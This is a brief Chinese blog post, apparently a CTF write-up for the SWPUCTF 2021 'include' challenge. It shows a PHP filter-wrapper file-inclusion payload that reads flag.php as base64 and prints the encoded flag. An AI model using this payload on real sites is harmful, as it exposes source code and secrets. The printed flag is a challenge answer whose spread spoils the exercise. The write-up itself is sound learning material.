[SWPUCTF 2021 新生赛]include

桑榆百川2024-08-11 21:24

传入一个file试试，尝试/?file=3

提示flag 在flag.php中，但是无法直接读出flag.php - 原因是由于flag.php中不具有echo相对应的输出语句，应该是仅具有$flag变量的定义。因此，采用php伪协议进行输出

?file=php://filter/convert.base64-encode/resource=flag.php

得到PD9waHANCiRmbGFnPSdOU1NDVEZ7Njk4MGY2OTctNzE0OC00M2FlLWFjZmUtNjk2OWZjMzdkNTgwfSc7

进行base64解密即可

上一篇：Java使用MQTT协议

下一篇：【lvs】

热门推荐

01GitHub 镜像站点 02OpenClaw 使用和管理 MCP 完全指南 03OpenClaw + 飞书（Feishu）环境搭建指南 04Claude Code + GLM4.7 避坑指南：解决 Unable to connect to Anthropic services 05OpenClaw优化飞书API 额度已耗尽问题 06Window 10部署openclaw报错node.exe : npm error code 128 07小黑课堂计算机二级WPSoffice题库软件下载安装教程（2026年3月最新版）08Clawdbot部署教程：解决‘gateway token missing’授权问题的完整步骤 09本地部署 OpenClaw + DeepSeek-R1 完全指南 10网站改了域名，如何查找？